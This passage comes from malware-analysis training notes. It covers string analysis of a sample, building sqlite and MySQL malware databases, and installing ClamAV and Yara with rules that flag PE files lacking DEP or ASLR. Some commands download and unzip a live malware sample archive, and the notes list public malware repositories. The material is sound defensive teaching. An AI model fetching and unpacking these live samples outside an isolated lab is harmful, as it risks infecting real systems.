2007 | Reference: http://www.garykessler.net/library/file_sigs.html | |
2008 | ||
2009 | ||
2010 | objdump -x malware.exe | |
2011 | ||
2012 | strings malware.exe | |
2013 | ||
2014 | strings --all malware.exe | head -n 6 | |
2015 | ||
2016 | strings malware.exe | grep -i dll | |
2017 | ||
2018 | strings malware.exe | grep -i library | |
2019 | ||
2020 | strings malware.exe | grep -i reg | |
2021 | ||
2022 | strings malware.exe | grep -i hkey | |
2023 | ||
2024 | strings malware.exe | grep -i hku | |
2025 | ||
2026 | - We didn't see anything like HKLM, HKCU or other registry type stuff | |
2027 | ||
2028 | strings malware.exe | grep -i irc | |
2029 | ||
2030 | strings malware.exe | grep -i join | |
2031 | ||
2032 | strings malware.exe | grep -i admin | |
2033 | ||
2034 | strings malware.exe | grep -i list | |
2035 | ||
2036 | ||
2037 | - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands | |
2038 | sudo apt-get install -y python-pefile | |
2039 | ||
2040 | vi analyse_malware.py | |
2041 | ||
2042 | python analyse_malware.py malware.exe | |
2043 | ||
2044 | ||
2045 | Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with: | |
2046 | http://derekmorton.name/files/malware_12-14-12.sql.bz2 | |
2047 | ||
2048 | ||
2049 | Malware Repositories: | |
2050 | http://malshare.com/index.php | |
2051 | http://www.malwareblacklist.com/ | |
2052 | http://www.virusign.com/ | |
2053 | http://virusshare.com/ | |
2054 | http://www.tekdefense.com/downloads/malware-samples/ | |
2055 | ||
2056 | ########################################## | |
2057 | # Lesson 31: Creating a Malware Database # | |
2058 | ########################################## | |
2059 | ||
2060 | Creating a malware database (sqlite) | |
2061 | ------------------------------------ | |
2062 | wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py | |
2063 | wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip | |
2064 | unzip malware-password-is-infected.zip | |
2065 | infected | |
2066 | python avsubmit.py --init | |
2067 | python avsubmit.py -f malware.exe -e | |
2068 | ||
2069 | ||
2070 | ||
2071 | ||
2072 | ||
2073 | Creating a malware database (mysql) | |
2074 | ----------------------------------- | |
2075 | Step 1: Installing MySQL database | |
2076 | Run the following command in the terminal: | |
2077 | ||
2078 | sudo apt-get install mysql-server | |
2079 | ||
2080 | Step 2: Installing Python MySQLdb module | |
2081 | Run the following command in the terminal: | |
2082 | ||
2083 | sudo apt-get build-dep python-mysqldb | |
2084 | sudo apt-get install python-mysqldb | |
2085 | ||
2086 | Step 3: Logging in | |
2087 | Run the following command in the terminal: | |
2088 | ||
2089 | mysql -u root -p (set a password of 'malware') | |
2090 | ||
2091 | Then create one database by running following command: | |
2092 | ||
2093 | create database malware; | |
2094 | ||
2095 | ||
2096 | ||
2097 | wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py | |
2098 | ||
2099 | vi mal_to_db.py -i (fill in database connection information) | |
2100 | ||
2101 | python mal_to_db.py -i | |
2102 | ||
2103 | python mal_to_db.py -i -f malware.exe -u | |
2104 | ||
2105 | ||
2106 | mysql -u root -p | |
2107 | malware | |
2108 | ||
2109 | mysql> use malware; | |
2110 | ||
2111 | select id,md5,sha1,sha256,time FROM files; | |
2112 | ||
2113 | mysql> quit; | |
2114 | ||
2115 | ||
2116 | ||
2117 | ||
2118 | ||
2119 | ############################## | |
2120 | # Lesson 32: Setting up Yara # | |
2121 | ############################## | |
2122 | ||
2123 | ||
2124 | sudo apt-get install clamav clamav-freshclam | |
2125 | ||
2126 | sudo freshclam | |
2127 | ||
2128 | sudo Clamscan | |
2129 | ||
2130 | sudo apt-get install libpcre3 libpcre3-dev | |
2131 | ||
2132 | wget https://github.com/plusvic/yara/archive/v3.1.0.tar.gz | |
2133 | ||
2134 | wget http://yara-project.googlecode.com/files/yara-python-1.4.tar.gz | |
2135 | ||
2136 | tar -zxvf v3.1.0.tar.gz | |
2137 | ||
2138 | cd yara-3.1.0/ | |
2139 | ||
2140 | ./bootstrap.sh | |
2141 | ||
2142 | ./configure | |
2143 | ||
2144 | make | |
2145 | ||
2146 | make check | |
2147 | ||
2148 | sudo make install | |
2149 | ||
2150 | cd yara-python/ | |
2151 | ||
2152 | python setup.py build | |
2153 | ||
2154 | sudo python setup.py install | |
2155 | ||
2156 | cd .. | |
2157 | ||
2158 | yara -v | |
2159 | ||
2160 | wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/3/clamav_to_yara.py | |
2161 | ||
2162 | sigtool -u /var/lib/clamav/main.cvd | |
2163 | ||
2164 | python clamav_to_yara.py -f main.ndb -o clamav.yara | |
2165 | ||
2166 | wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip | |
2167 | ||
2168 | unzip malware-password-is-infected.zip | |
2169 | infected | |
2170 | ||
2171 | mkdir malcode/ | |
2172 | ||
2173 | mv malware.exe malcode/ | |
2174 | ||
2175 | vi testrule.yara | |
2176 | ---------------- | |
2177 | rule IsPE | |
2178 | { | |
2179 | meta: | |
2180 | description = "Windows executable file" | |
2181 | ||
2182 | condition: | |
2183 | // MZ signature at offset 0 and ... | |
2184 | uint16(0) == 0x5A4D and | |
2185 | // ... PE signature at offset stored in MZ header at 0x3C | |
2186 | uint32(uint32(0x3C)) == 0x00004550 | |
2187 | } | |
2188 | ||
2189 | rule has_no_DEP | |
2190 | { | |
2191 | meta: | |
2192 | description = "DEP is not enabled" | |
2193 | ||
2194 | condition: | |
2195 | IsPE and | |
2196 | uint16(uint32(0x3C)+0x5E) & 0x00100 == 0 | |
2197 | } | |
2198 | ||
2199 | rule has_no_ASLR | |
2200 | { | |
2201 | meta: | |
2202 | description = "ASLR is not enabled" | |
2203 | ||
2204 | condition: | |
2205 | IsPE and | |
2206 | uint16(uint32(0x3C)+0x5E) & 0x0040 == 0 | |
2207 | } | |
2208 | ---------------- | |
2209 | ||
2210 | ||
2211 | yara testrule.yara malcode/malware.exe | |
2212 | ||
2213 | mkdir rules/ | |
2214 | ||
2215 | cd rules/ | |
2216 | ||
2217 | wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/5/capabilities.yara | |
2218 | ||
2219 | wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/6/magic.yara | |
2220 | ||
2221 | wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/4/packer.yara | |
2222 | ||
2223 | cd .. | |
2224 | ||
2225 | yara rules/ malcode/malware.exe | |
2226 | ||
2227 | wget https://github.com/Xen0ph0n/YaraGenerator/archive/master.zip | |
2228 | ||
2229 | unzip master.zip | |
2230 | ||
2231 | cd YaraGenerator-master/ | |
2232 | ||
2233 | python yaraGenerator.py ../malcode/ -r Test-Rule-2 -a "Joe McCray" -d "Test Rule Made With Yara Generator" -t "TEST" -f "exe" | |
2234 | ||
2235 | cat Test-Rule-2.yar | |
2236 | ||
2237 | wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe | |
2238 | ||
2239 | yara Test-Rule-2.yar putty.exe | |
2240 | ||
2241 | ||
2242 | ||
2243 | ||
2244 | ||
2245 | ||
2246 | ||
2247 | ||
2248 | ||
2249 | ||
2250 | ||
2251 | ||
2252 | ||
2253 | ||
2254 | #################### | |
2255 | # Additional Tasks # | |
2256 | #################### | |
2257 | ||
2258 | - PE Scanner: | |
2259 | https://malwarecookbook.googlecode.com/svn/trunk/3/8/pescanner.py | |
2260 | http://www.beenuarora.com/code/analyse_malware.py | |
2261 | ||
2262 | - AV submission: | |
2263 | http://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py | |
2264 | https://raw.githubusercontent.com/dcmorton/MalwareTools/master/vtsubmit.py | |
2265 | ||
2266 | - Malware Database Creation: | |
2267 | https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py |